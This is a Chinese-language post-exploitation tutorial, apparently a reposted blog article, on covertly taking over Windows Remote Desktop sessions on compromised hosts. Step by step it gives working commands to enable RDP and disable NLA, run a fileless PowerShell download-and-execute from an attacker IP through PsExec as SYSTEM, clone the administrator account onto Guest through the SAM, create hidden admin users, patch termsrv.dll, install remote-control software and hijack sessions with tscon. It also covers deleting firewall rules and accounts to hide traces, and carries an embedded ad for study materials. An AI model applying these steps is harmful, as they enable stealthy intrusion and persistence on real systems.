Windows远程桌面的奇技淫巧

前言

• Windows远程桌面简介
  

远程桌面协议(RDP)是一个多通道(multi-channel)的协议，让使用者连上提供微软终端机服务的计算机(称为服务端或远程计算机)

• 远程桌面的前置条件
  

在获取权限后，针对3389举行睁开，先查询3389端口是否开启

1. netstat -ano | findstr 3389

复制代码

发现没有开启（也有大概更改了端口），则可以通过注册表举行手动启动（需要管理员权限）

1. REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f      （开启）
2. REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 11111111 /f      （关闭）

复制代码

若执行失败，大概由于体系版本过旧（以下开启命令适用于Windows Server 2003之前体系）

1. wmic path Win32_TerminalServiceSetting where (__class = "Win32_TerminalServiceSetting") call SetAllowTSConnections 1（开启）
2. wmic path Win32_TerminalServiceSetting where (__class = "Win32_TerminalServiceSetting") call SetAllowTSConnections 0（关闭）

复制代码

[img=720,388.33700000000005]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202407081520513.png[/img]

有些运维人员会勾选”仅答应使用网络级别的身份验证的远程桌面的计算机连接”选项，我们也可以通过注册表举行关闭，避免影响连接（开启同理0替换成1）

1. REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f

复制代码

[img=720,342.0079610791685]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202407081520515.png[/img]

为了避免运维人员更改了RDP端口，可以确认下RDP端口

1. reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Winstations\RDP-Tcp" /V PortNumber

复制代码

[img=720,388.100147275405]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202407081520516.png[/img]

正常若是3389端口为0xd3d（默认是十六进制表示）

在这里还需要保证防火墙等安全装备没有克制且相互之间网络必须相通，这里防火墙设置只答应单独端口放通，减少运维人员的警觉（只答应3389端口放通）

1. netsh advfirewall firewall add rule name="RemoteDesktop" protocol=TCP dir=in localport=3389 action=allow

复制代码

通过命令删除防火墙的通行战略（清理陈迹）

1. netsh advfirewall firewall delete rule name="RemoteDesktop"

复制代码

【----帮助网安学习，以下所有学习资料免费领！加vx：dctintin，备注 “博客园” 获取！】
　① 网安学习成长路径思维导图
　② 60+网安经典常用工具包
　③ 100+SRC毛病分析报告
　④ 150+网安攻防实战技术电子书
　⑤ 最权威CISSP 认证考试指南+题库
　⑥ 超1800页CTF实战技巧手册
　⑦ 最新网安大厂面试题合集（含答案）
　⑧ APP客户端安全检测指南（安卓+IOS）
克隆账户接管administrator桌面

• 适用场景
  

在无法获取明文密码或者Hash等根据，但是想接管及时的administrator桌面

• 利用步骤（默认情况下需要system权限）
  

在administrator权限下举行切换（利用PsExec工具举行powershell无文件落地上线system权限）

1. shell "PsExec64.exe -accepteula -s powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.108.132:8080/a'))""

复制代码

（-accepteula同意最终用户许可协议End User License Agreement，否则会弹窗无法运行）

[img=720,385.5]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202407081520518.png[/img]

查询用户的SID，方便选择克隆对象（常克隆Guest用户，体系自带不易察觉且默认的SID为501）

[img=720,390.16168544830964]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202407081520520.png[/img]

这里克隆administrator用户为Guest用户，将SID为500（对应十六进制为0x1f4）的管理员账号的相关信息导出为admin.reg

1. regedit /e admin.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4

复制代码

[img=720,388.2352941176471]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202407081520521.png[/img]

将注册表文件下载到本地方便编辑（下载后默认在本地CS目录的下的download文件夹下，文件下载后需要重命名）

1. download admin.reg

复制代码

[img=720,383.90625]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202407081520522.png[/img]

将admin.reg文件的第三行HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4中的“1F4”修改为Guest的SID为1F5（十六进制），并保存为new.reg（方便区分）

[img=720,356.8468740561764]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202407081520523.png[/img]

将new.reg重新上传到受害机中

[img=720,388.7573964497041]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202407081520524.png[/img]

导入编辑好的new.reg文件

1. regedit /s new.reg

复制代码

修改Guest密码便于远程登录，并及时清理两个reg文件

1. net user Guest Admin@123
2. del /F C:\Users\Administrator\Desktop\admin.reg C:\Users\Administrator\Desktop\new.reg

复制代码

[img=720,228.63673469387754]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202407081520525.png[/img]

此时直接举行远程登录Guest账户，其实是administrator账户的体系，成功接管！

[img=720,410.0850546780073]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202407081520526.png[/img]

新建隐藏管理员+远程软件+会话劫持组合拳接管administrator桌面

• 适用场景
  

在无法获取明文密码或者Hash等根据，但是想接管及时的administrator桌面

• 利用步骤
  

添加新隐藏用户

1. net user yuzi$ Admin@123 /add

复制代码

将新隐藏用户添加到管理员组

1. net localgroup administrators yuzi$ /add

复制代码

此时直接举行远程登录隐藏账户，举行图形化操纵

[img=720,676.987012987013]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202407081520527.png[/img]

若遇到对方已有用户在线，大概会出现以下界面（Windows sever版本默认支持多用户同时在线，Windows其他版本不支持）

[img=720,410.0850546780073]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202407081520529.png[/img]

此时为了做到更加埋伏的举行登录（强迫登录会使对方会话掉线），可以修改termsrv.dll文件实现，操纵前要将所有权转移给本地管理员，向本地管理员组授予对termsrv.dll文件的“完全控制”权限（若是通过powershell无文件远控的形式执行如下命令大概会出现问题，则需要在可执行木马的远控场景执行命令）

1. takeown /F c:\Windows\System32\termsrv.dll /A
2. icacls c:\Windows\System32\termsrv.dll /grant Administrators:F

复制代码

修改体系文件大概会导致体系不稳定，确保有原始termsrv.dll文件的备份

1. copy c:\Windows\System32\termsrv.dll termsrv.dll_backup

复制代码

[img=720,269.9399599733155]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202407081520530.png[/img]

接下来将对方的c:\Windows\System32\termsrv.dll文件下载至本地

1. download c:\Windows\System32\termsrv.dll

复制代码

在编辑dll前需要确认当前体系的版本号，查看Windows的版本号

1. powershell Get-ComputerInfo -Property WindowsVersion, OsName

复制代码

[img=720,164.26439232409382]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202407081520531.png[/img]

通过十六进制文本编辑器举行编辑termsrv.dll文件，按照差别的Windows的版本查找对应的字符串标识，替换为B8 00 01 00 00 89 81 38 06 00 00 90

[img=720,376.1461794019934]https://www.yijinglab.com/headImg.action?news=0b7b8460-2a42-4a7d-80a9-39c1a5e6bbbd.png[/img]

[img=720,484.0366972477064]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202407081520532.png[/img]

修改完成后上传至对方，举行逼迫替换体系自带的termsrv.dll，（替换前需要先制止远程服务，以免发生冲突，替换后再重新启用远程服务）

1. net stop TermService /y
2. copy /y C:\Users\Administrator\Desktop\termsrv.dll c:\windows\system32\termsrv.dll
3. net start TermService

复制代码

[img=720,312.5833804409271]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202407081520533.png[/img]

重新举行3389远程连接，发现已经可以直接登录到新建隐藏管理员桌面，不再出现提示页面

[img=720,410.0850546780073]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202407081520534.png[/img]

借助Windows的特性，直接在新建隐藏管理员桌面安装轻量级的远控桌面软件并运行（这里以GotoHTTP为例）

[img=720,354.41759826902273]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202407081520535.png[/img]

在攻击机本地举行GotoHTTP远程桌面时候，发现已经成功接管了administrator的及时桌面（由于GotoHTTP是以管理员身份运行的故显示的administrator桌面）

[img=720,353.8329764453961]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202407081520536.png[/img]

若运气不好，发现利用GotoHTTP远程后在锁定页面，此时还可以配合会话劫持举行接管administrator及时桌面

[img=720,351.219512195122]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202407081520537.png[/img]

接下来举行劫持（劫持administrator的会话），查询可劫持的会话

1. quser

复制代码

[img=720,351.8680530656149]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202407081520538.png[/img]

以管理员权限运行cmd，创建服务（用于会话劫持的权限需要system，恰恰Windows的服务是以system权限运行，此中的1为需要劫持的ID值）

1. sc create rdp binpath= "cmd.exe /k tscon 1 /dest:console"

复制代码

 

[img=720,388.4307692307692]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202407081520539.png[/img]

启动并且删除服务后，发现此时的GotoHTTP页面已经成功进入解锁状态的桌面

1. sc start rdp & sc delete rdp & exit

复制代码

[img=720,352.26914817465996]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202407081520540.png[/img]

远程竣事后举行删除隐藏用户（清理陈迹，这类隐藏用户轻易发现）

1. net user yuzi$ /delete

复制代码

更多网安技能的在线实操训练，请点击这里>>
  

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！更多信息从访问主页：qidao123.com:ToB企服之家，中国第一个企服评测及商务社交产业平台。